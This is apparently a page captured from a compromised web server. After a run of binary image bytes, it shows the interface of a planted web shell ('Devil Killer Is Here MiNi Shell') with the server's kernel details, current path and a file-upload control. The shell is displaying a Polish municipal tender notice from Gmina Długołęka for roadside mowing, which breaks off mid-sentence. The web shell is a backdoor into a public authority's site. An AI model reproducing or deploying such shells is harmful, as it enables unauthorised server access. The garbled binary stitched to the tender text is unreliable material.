JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200305/520632-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 520632-N-2020 z dnia 2020-03-05 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Długołęka</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Koszenie poboczy i innych elementów (skarpa, przeciwskarpa, rowy) pasa drogowego dróg utwardzonych i gruntowych zlokalizowanych na terenie gminy Długołęka - z podziałem na części (pakiety)</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Długołęka</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">93193501700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Długołęka, ul. Robotnicza</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">12</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">55-095</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Mirków</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">71 323 02 03, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">a.kranc@gmina.dlugoleka.pl, k.pietrzak@gmina.dlugoleka.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">71 323 02 04</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://dlugoleka.bip.net.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://dlugoleka.bip.net.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://dlugoleka.bip.net.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty pod rygorem nieważności należy złożyć w formie pisemnej, zgodnie z zapisami SIWZ.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy Długołęka (Biuro Podawcze - parter), Długołęka ul. Robotnicza 12, 55-095 Mirków</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Koszenie poboczy i innych elementów (skarpa, przeciwskarpa, rowy) pasa drogowego dróg utwardzonych i gruntowych zlokalizowanych na terenie gminy Długołęka - z podziałem na części (pakiety)</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.8.2020.KP</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci">2</span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">2</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia są usługi koszenia poboczy i innych elementów pasa drogowego (w tym: skarpa, przeciwskarpa, rowy) dróg utwardzonych i gruntowych zlokalizowanych na terenie gminy Długołęka.1.1.	CZĘŚĆ I – PAKIET NR 1Przedmiotem zamówienia są usługi koszenia poboczy i innych elementów pasa drogowego (w tym: skarpa, przeciwskarpa, rowy) dróg utwardzonych i gruntowych zlokalizowanychna terenie gminy Długołęka w następujących miejscowościach: Mirków, Byków, Szczodre, Domaszczyn, Pruszowice, Ramiszów, Pasikurowice, Siedlec, Godzieszowa, Tokary, Bukowina, Bąków, Łozina, Bierzyce, Zaprężyn, Krakowiany, Budziwojowice, Łosice, Dąbrowica, Michałowice, Kępa, Dobroszów Oleśnicki, Januszkowice, Jaksonowice, Skała, Stępin, Węgrów.Szczegółowy zakres przedmiotu zamówienia obejmuje:1)	koszenia mechaniczne poboczy pasa drogowego i innych jego elementów (skarpa, przeciwskarpa, rowy) dróg gminnych (około 19 000 ar), tj.: a)	koszenie traw i chwastów na szerokości 1,5 – 2,0 m od krawędzi jezdni pasa drogowego oraz skarp, przeciwskarp i rowów – do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cm,d)	zgrabienie, załadunek i wywóz ściętej trawy zalegającej po skoszeniu na trawnikach, jezdni, chodnikach, parkingach i innych miejscach utwardzonych (zgodnie z obowiązującymi przepisami) niezwłocznie po skoszeniu jednak nie później niż w ciągu 12 godzin od skoszenia,e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowy i inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne.2)	koszenia mechaniczne poboczy pasa drogowego i innych jego elementów (skarpa, przeciwskarpa, rowy) dróg powiatowych (około 15 680 ar), tj.: a)	koszenie traw i chwastów na całej powierzchni pasa drogowego (pobocze, skarpy, rowy drogowe i pas terenu za rowem) – do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cm,d)	ściętą trawę z pasa drogowego dróg powiatowych należy mulczować i usunąć (zdmuchać)z jezdni na pas zieleni. W przypadku zagrożenia zatkania się systemów odprowadzających wody, należy skoszoną trawę wywieźć lub odpowiednio zutylizować. Skoszona trawaw każdym przypadku powinna być usunięta z jezdni, z pobocza, chodników,e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowyi inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne.3)	koszenia mechaniczne na szerokości 1,5 – 2,0 m poboczy (ze skarpą) w pasie drogowym dróg powiatowych (około 22 400 ar), tj.:a)	koszenie traw i chwastów na szerokości 1,5 – 2,0 m od krawędzi jezdni pasa drogowego (skarpa) - do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cm,d)	ściętą trawę z pasa drogowego dróg powiatowych należy mulczować i usunąć (zdmuchać) z jezdni na pas zieleni. W przypadku zagrożenia zatkania się systemów odprowadzających wody, należy skoszoną trawę wywieźć lub odpowiednio zutylizować. Skoszona trawaw każdym przypadku powinna być usunięta z jezdni, z pobocza, chodników. e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowy i inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne. 1.2.	CZĘŚĆ II – PAKIET NR 2Przedmiotem zamówienia są usługi koszenia poboczy i innych elementów pasa drogowego (w tym: skarpa, przeciwskarpa, rowy) dróg utwardzonych i gruntowych zlokalizowanychna terenie gminy Długołęka w następujących miejscowościach: Mirków, Byków, Szczodre, Domaszczyn, Pruszowice, Ramiszów, Pasikurowice, Siedlec, Godzieszowa, Tokary, Bukowina, Bąków, Łozina, Bierzyce, Zaprężyn, Krakowiany, Budziwojowice, Łosice, Dąbrowica, Michałowice, Kępa, Dobroszów Oleśnicki, Januszkowice, Jaksonowice, Skała, Stępin, Węgrów.Szczegółowy zakres przedmiotu zamówienia obejmuje:1)	koszenia mechaniczne poboczy pasa drogowego i innych jego elementów (skarpa, przeciwskarpa, rowy) dróg gminnych (około 16 500 ar), tj.: a)	koszenie traw i chwastów na szerokości 1,5 – 2,0 m od krawędzi jezdni pasa drogowego oraz skarp, przeciwskarp i rowów – do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cmd)	zgrabienie, załadunek i wywóz ściętej trawy zalegającej po skoszeniu na trawnikach, jezdni, chodnikach, parkingach i innych miejscach utwardzonych (zgodnie z obowiązującymi przepisami) niezwłocznie po skoszeniu jednak nie później niż w ciągu 12 godzin od skoszenia,e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowy i inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne. 2)	koszenia mechaniczne poboczy pasa drogowego i innych jego elementów (skarpa, przeciwskarpa, rowy) dróg powiatowych (około 9 668 ar), tj.: a)	koszenie traw i chwastów na całej powierzchni pasa drogowego (pobocze, skarpy, rowy drogowe i pas terenu za rowem) – do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cm,d)	ściętą trawę z pasa drogowego dróg powiatowych należy mulczować i usunąć (zdmuchać) z jezdni na pas zieleni. W przypadku zagrożenia zatkania się systemów odprowadzających wody, należy skoszoną trawę wywieźć lub odpowiednio zutylizować. Skoszona trawa w każdym przypadku powinna być usunięta z jezdni, z pobocza, chodników. e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowy i inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne. 3)	koszenia mechaniczne na szerokości 1,5 – 2,0 m poboczy (ze skarpą) w pasie drogowym dróg powiatowych (około 13 808 ar), tj.: a)	koszenie traw i chwastów na szerokości 1,5 – 2,0 m od krawędzi jezdni pasa drogowego (skarpa) - do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cm,d)	ściętą trawę z pasa drogowego dróg powiatowych należy mulczować i usunąć (zdmuchać) z jezdni na pas zieleni. W przypadku zagrożenia zatkania się systemów odprowadzających wody, należy skoszoną trawę wywieźć lub odpowiednio zutylizować. Skoszona trawa w każdym przypadku powinna być usunięta z jezdni, z pobocza, chodników. e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowy i inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne.1.3.	Przedmiotem zamówienia objęte są drogi zarządzane przez Wójta Gminy Długołęka oraz Starostę Powiatu Wrocławskiego wskazane w zleceniu jednostkowym, o którym mowa w §1 ust. 5 i 6 Projektu umowy.1.4.	Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 8 do SIWZ pn. Projekt umowy.2.	Miejscem wykonywania całego przedmiotu zamówienia jest w CZĘŚCI I (pakiecie nr 1): Mirków, Byków, Szczodre, Domaszczyn, Pruszowice, Ramiszów, Pasikurowice, Siedlec, Godzieszowa, Tokary, Bukowina, Bąków, Łozina, Bierzyce, Zaprężyn, Krakowiany, Budziwojowice, Łosice, Dąbrowica, Michałowice, Kępa, Dobroszów Oleśnicki, Januszkowice, Jaksonowice, Skała, Stępin, Węgrów / w CZĘŚCI II (pakiecie nr 2): Długołęka, Borowa, Raków, Bielawa, Kamień, Piecowice, Kiełczów, Wilczyce, Kiełczówek, Śliwice, Pietrzykowice, Brzezia Łąka, Kątna i Oleśniczka3.	Wymagania dotyczące zatrudnienia osób na umowę o pracę3.1.	Zgodnie z art. 29 ust. 3a ustawy Pzp, Zamawiający wymaga zatrudnienia przez Wykonawcęlub podwykonawcę na podstawie umowy o pracę w rozumieniu przepisów art. 22 § 1 ustawyz dnia 26 czerwca 1974 r. Kodeks pracy (tekst jednolity Dz. U. z 2019 r. poz. 1040 ze zm.) osób, które będą wykonywać czynności bezpośrednio związane z realizacją usługi bieżącego utrzymania zieleni w pasie drogowym, tj. wszystkie osoby, które będą uczestniczyćw czynnościach polegających na: koszeniu pasa drogowego, grabieniu, wywozie ściętej trawy, operatorzy sprzętu używanego do koszenia – kosiarki ciągnikowej, kosy spalinowej, kosiarki 